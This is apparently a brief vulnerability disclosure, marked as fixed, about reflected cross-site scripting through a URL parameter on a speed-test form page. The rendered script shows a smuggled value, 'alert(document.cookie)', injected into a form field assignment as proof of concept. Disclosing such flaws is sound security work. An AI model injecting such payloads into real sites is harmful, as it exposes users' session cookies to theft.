XSS vulnerability through a URL parameter
An attacker can send a user to a malicious URL that contains a parameter with some JavaScript that gets rendered and executed on the page as is.
function submitForm(){
document.getElementById('downloadSpeed').value=0;
document.getElementById('uploadSpeed').value=;
document.getElementById('totalbytes').value=0;alert(document.cookie);
document.getElementById('start').value=;
document.getElementById('end').value=;
document.getElementById('startUpTime').value=;
document.getElementById('endUpTime').value=;
document.getElementById('uploadSize').value=;
Reported Fixed
Back